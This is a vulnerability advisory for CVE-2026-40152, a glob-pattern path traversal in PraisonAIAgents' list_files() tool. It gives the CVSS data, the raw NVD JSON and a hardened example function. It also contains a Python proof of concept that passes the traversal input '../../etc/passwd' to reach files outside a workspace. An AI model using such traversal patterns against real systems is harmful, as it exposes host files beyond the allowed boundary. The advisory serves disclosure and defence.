Security Vulnerability Report
CVE-2026-40152 CVSS 5.3 MEDIUM

Published: 2026-04-09 22:16:36
Last Modified: 2026-04-20 18:33:29

Description

PraisonAIAgents is a multi-agent teams system. Prior to 1.5.128, the list_files() tool in FileTools validates the directory parameter against workspace boundaries via _validate_path(), but passes the pattern parameter directly to Path.glob() without any validation. Since Python's Path.glob() supports .. path segments, an attacker can use relative path traversal in the glob pattern to enumerate arbitrary files outside the workspace, obtaining file metadata (existence, name, size, timestamps) for any path on the filesystem. This vulnerability is fixed in 1.5.128.

CVSS Details

CVSS Score: 5.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:praison:praisonaiagents:*:*:*:*:*:*:*:* - VULNERABLE
PraisonAIAgents < 1.5.128

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import os
from pathlib import Path

# Simulating the vulnerable behavior in PraisonAIAgents prior to 1.5.128
# This demonstrates how an unvalidated pattern leads to path traversal
def vulnerable_list_files(directory, pattern):
    # In the vulnerable code, directory is validated, but pattern is not.
    # The pattern is passed directly to Path.glob()
    target_path = Path(directory)
    results = []

    # Path.glob() resolves '..' in the pattern, allowing traversal
    for p in target_path.glob(pattern):
        if p.is_file():
            results.append({
                "name": p.name,
                "path": str(p.resolve()),
                "size": p.stat().st_size
            })
    return results

# Exploit Scenario
workspace = "/app/workspace"

# Malicious input: using '../' to escape the workspace
# This attempts to list /etc/passwd if the workspace is /app/workspace
malicious_pattern = "../../etc/passwd"

print(f"[*] Attempting to list files in '{workspace}' with pattern: '{malicious_pattern}'")

# Note: This code is for analysis purposes only.
# Actual execution depends on the file system structure.
try:
    leaked_files = vulnerable_list_files(workspace, malicious_pattern)
    if leaked_files:
        print("[!] Vulnerability exploited! Found files:")
        for f in leaked_files:
            print(f" - Path: {f['path']}, Size: {f['size']}")
    else:
        print("[-] No files found or path does not exist.")
except Exception as e:
    print(f"Error: {e}")
```
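A hardened counterpart to the vulnerable function above, added here as an illustration; it is not the project's code and not the 1.5.128 patch. The name safe_list_files, its workspace argument, and the temporary directory layout built in demo() are assumptions made for this example (requires Python 3.9+ for Path.is_relative_to).

```python
import tempfile
from pathlib import Path


def safe_list_files(workspace, directory, pattern):
    """List files under workspace/directory matching pattern, never outside workspace.

    Hypothetical helper for illustration; not the PraisonAIAgents API.
    """
    root = Path(workspace).resolve()
    base = (root / directory).resolve()
    if not base.is_relative_to(root):
        raise ValueError("directory escapes workspace")

    # Check 1: refuse absolute patterns and any '..' segment before globbing.
    segments = pattern.replace("\\", "/").split("/")
    if Path(pattern).is_absolute() or pattern.startswith(("/", "\\")) or ".." in segments:
        raise ValueError("pattern escapes workspace")

    results = []
    for p in base.glob(pattern):
        # Check 2: a symlink inside the workspace can still point outside it,
        # so compare the resolved target against the workspace root.
        real = p.resolve()
        if real.is_relative_to(root) and real.is_file():
            results.append({"name": p.name, "path": str(real), "size": real.stat().st_size})
    return sorted(results, key=lambda r: r["path"])


def demo():
    """Constructed layout: <tmp>/ws/a.txt is inside, <tmp>/secret.txt is outside."""
    with tempfile.TemporaryDirectory() as tmp:
        ws = Path(tmp, "ws")
        ws.mkdir()
        (ws / "a.txt").write_text("in")
        Path(tmp, "secret.txt").write_text("out")
        # Unvalidated glob, as in the vulnerable function: '..' leaves the workspace.
        leaked = [p.name for p in ws.glob("../secret.txt")]
        allowed = [r["name"] for r in safe_list_files(ws, ".", "*.txt")]
        try:
            safe_list_files(ws, ".", "../secret.txt")
            blocked = False
        except ValueError:
            blocked = True
        return leaked, allowed, blocked


if __name__ == "__main__":
    print(demo())
```

The pattern check alone stops the traversal described in this CVE; the resolved-path check is defense in depth for symlinks and for any pattern syntax the first check does not anticipate.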

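References

https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-7j2f-xc8p-fjmq (Exploit, Vendor Advisory)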

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-40152", "sourceIdentifier": "[email protected]", "published": "2026-04-09T22:16:36.193", "lastModified": "2026-04-20T18:33:29.100", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "PraisonAIAgents is a multi-agent teams system. Prior to 1.5.128, he list_files() tool in FileTools validates the directory parameter against workspace boundaries via _validate_path(), but passes the pattern parameter directly to Path.glob() without any validation. Since Python's Path.glob() supports .. path segments, an attacker can use relative path traversal in the glob pattern to enumerate arbitrary files outside the workspace, obtaining file metadata (existence, name, size, timestamps) for any path on the filesystem. This vulnerability is fixed in 1.5.128."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:praison:praisonaiagents:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.5.128", "matchCriteriaId": "B1797C27-7EBC-4CEF-90B8-F84E8198632D"}]}]}], "references": [{"url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-7j2f-xc8p-fjmq", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}